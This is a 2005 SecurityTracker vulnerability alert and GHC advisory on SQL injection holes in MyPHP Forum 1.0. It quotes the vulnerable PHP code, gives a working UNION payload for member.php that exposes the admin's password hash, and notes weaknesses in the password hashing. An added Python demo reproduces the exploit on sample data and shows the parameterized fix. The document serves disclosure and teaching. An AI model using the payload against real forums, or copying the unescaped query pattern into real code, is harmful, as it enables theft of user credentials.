SecurityTracker.com

SecurityTracker
Archives


 


Category:  Application (Forum/Board/Portal) > MyPHP Forum
Vendors:  myphp.ws
MyPHP Forum Input Validation Holes Let Remote Users Inject SQL Commands
SecurityTracker Alert ID:  1013136
SecurityTracker URL:  http://securitytracker.com/id/1013136
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Feb 9 2005
Impact:  Disclosure of system information, Disclosure of user information
Exploit Included:  Yes
Version(s):  1.0
Description:   A vulnerability was reported in MyPHP Forum. A remote user can inject SQL commands.

Several scripts place user-supplied input directly into SQL queries without validation or escaping. A remote user can supply specially crafted input to execute SQL commands on the underlying database. The flaws are exploitable as reported when 'magic_quotes_gpc' is off; magic quotes only backslash-escapes quotes in request data and is not a substitute for parameterized queries.

The 'forum.php' script does not properly validate user-supplied input in the 'fid' parameter.

The 'member.php' script does not properly validate user-supplied input in the 'member' parameter. A demonstration exploit URL is provided:

member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password, status, email, website, aim, msn, location, sig, regdate, posts, password as yahoo FROM nb_member WHERE uid='1

The 'forgot.php' script does not properly validate user-supplied input in the 'email' parameter.

The 'include.php' script does not properly validate user-supplied input in the 'nbuser' and 'nbpass' parameters.

foster GHC reported these flaws.

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.myphp.ws/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Several SQL injection bugs in myPHP Forum v.1.0




/*==========================================*/
// GHC -> MyPHP Forum <- ADVISORY
// Product: MyPHP Forum
// Version: 1.0
// URL: http://www.myphp.ws
// VULNERABILITY CLASS: SQL injection
/*==========================================*/

[Product Description]
MyPHP Forum is a simple message board script with limited features.

[Summary]
Several SQL injection vulnerabilities may lead to disclosure of sensitive information,
including users' password hashes.

[Details]
Most user-supplied variables are used as-is in SQL queries.

[1] script name: forum.php

---[code]---
// $fid comes straight from the request and is interpolated into the query unescaped
$query = mysql_query("SELECT fid, name FROM $db_forum WHERE fid='$fid'") or die(mysql_error());
$nav = mysql_fetch_array($query);
---[/code]---

The $fid variable is used without any filtering, allowing SQL injection.

[2] script name: member.php

---[code]---
if($action == "viewpro") {
        // $member is read from the GET request and used directly in the query
        $member = $HTTP_GET_VARS['member'];
        $sql =  "SELECT * FROM $db_member WHERE username='$member'";
        $query = mysql_query("SELECT * FROM $db_member WHERE username='$member'") or die("cant execute $sql");
        $member = mysql_fetch_array($query);
---[/code]---

SQL code can be injected via:
member.php?action=viewpro&member=[SQL code]

[example of exploit]
member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password, status, email, website, aim, msn, location, sig, regdate, posts, password as yahoo FROM nb_member WHERE uid='1
This displays the administrator's username and password hash; the hash is aliased into the "Yahoo" field, which the profile page renders.

Passwords are hashed by the encrypt() function:
---[code]---
function encrypt($string) {
    // the MD5 hex digest is passed to crypt() as both the key and the salt
    $crypted = crypt(md5($string), md5($string));
    return $crypted;
}
---[/code]---
Because the salt carries no algorithm prefix such as "$1$", crypt() falls back to traditional DES, which uses only the first two salt characters and the first eight characters of the key (here, the first eight hex digits of the MD5). The salt is derived from the password itself, so identical passwords produce identical hashes.
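The member.php injection above, reproduced as an added example that is not part of the advisory or of MyPHP Forum's code: it runs the published payload against an in-memory SQLite table named nb_member and then repeats the lookup with a bound parameter. The column list, column types and sample rows are constructed assumptions (the page only establishes the thirteen column names used in the UNION payload and that the thirteenth is displayed as "Yahoo"); SQLite stands in for MySQL so the example runs offline, and the string-concatenation flaw is the same in both.

```python
"""
Added example (not MyPHP Forum code): reproduce the member.php UNION-based
injection from the GHC advisory against SQLite, then show the parameterized
form that closes it. Schema and sample rows are constructed for this demo.
"""
import sqlite3

# Columns in the order the UNION payload supplies them. The thirteenth is
# assumed to be 'yahoo' because the payload aliases 'password' into it.
COLUMNS = ["uid", "username", "password", "status", "email", "website",
           "aim", "msn", "location", "sig", "regdate", "posts", "yahoo"]

# Fields the profile page is assumed to render: everything except password.
PROFILE_FIELDS = [c for c in COLUMNS if c != "password"]

# The 'member' value exactly as published in the advisory (URL-decoded).
PAYLOAD = ("nonexist' UNION SELECT uid, username, password, status, email, "
           "website, aim, msn, location, sig, regdate, posts, password as yahoo "
           "FROM nb_member WHERE uid='1")


def build_db():
    """Constructed sample data: the admin (uid 1) and one ordinary member.
    uid is declared INTEGER so that the payload's uid='1' compares as a
    number, as it would in MySQL."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE nb_member ("
        "uid INTEGER, username TEXT, password TEXT, status INTEGER, email TEXT, "
        "website TEXT, aim TEXT, msn TEXT, location TEXT, sig TEXT, "
        "regdate TEXT, posts INTEGER, yahoo TEXT)"
    )
    rows = [  # hash values are made-up 13-character strings, not real hashes
        (1, "admin", "aaXd2Qf1vB6yk", 1, "admin@example.invalid", "", "", "",
         "", "", "2005-01-01", 100, ""),
        (2, "alice", "bbQe7ZwL0mNop", 0, "alice@example.invalid", "", "", "",
         "", "", "2005-02-01", 5, "alice_y"),
    ]
    db.executemany(f"INSERT INTO nb_member VALUES ({','.join('?' * 13)})", rows)
    return db


def render_profile(row):
    """Mimic the profile view: show every column except the password."""
    if row is None:
        return None
    record = dict(zip(COLUMNS, row))
    return {k: record[k] for k in PROFILE_FIELDS}


def view_profile_vulnerable(db, member):
    """member.php as quoted in the advisory: $member interpolated into SQL.
    The payload closes the quoted string and appends a UNION that selects
    the admin's password hash into the yahoo column."""
    sql = f"SELECT * FROM nb_member WHERE username='{member}'"
    return render_profile(db.execute(sql).fetchone())


def view_profile_fixed(db, member):
    """Same lookup with a bound parameter: the input is only ever a value,
    so the payload is searched for literally as a username and matches nothing."""
    sql = "SELECT * FROM nb_member WHERE username=?"
    return render_profile(db.execute(sql, (member,)).fetchone())


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", view_profile_vulnerable(db, PAYLOAD))
    print("fixed:     ", view_profile_fixed(db, PAYLOAD))
```

Run as a script, the vulnerable lookup returns the admin profile with the password hash sitting in the yahoo field, while the parameterized lookup returns nothing because no member is literally named after the payload. Binding the parameter is the fix; escaping the quote (which is all magic_quotes_gpc or addslashes would do) only protects quoted string contexts and leaves numeric ones such as forum.php's fid exposed if they are ever used unquoted.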

[3] script name: forgot.php

---[code]---
$email = $_REQUEST['email'];
        if (isset($email)) {
        $sql="SELECT * FROM $db_member WHERE email='$email'";  
...
$result = mysql_query("SELECT username FROM $db_member WHERE email='$email'");
                        $username = mysql_result($result, 0);
                        $msg = "
                        Hello $username,
---[/code]---
The $email variable is used without any filtering.
IMPACT: SQL injection through this variable.

[4] script name: include.php
This is the most important script, since it is included by all the others.
The $nbuser and $nbpass variables are not filtered.

---[code]---
// $nbuser is interpolated into the query without escaping
$query = mysql_query("SELECT * FROM $db_member WHERE username='$nbuser'")
---[/code]---
IMPACT: SQL injection through $nbuser.

P.S. All bugs apply when magic_quotes_gpc=0.

/* ================================================== */
/* www.ghc.ru -- security games & challenges          */
/* ================================================== */
/* greets to: RST.void.ru, D0G4 & all quest hunters %)*/
/* ================================================== */


Copyright 2019, SecurityGlobal.net LLC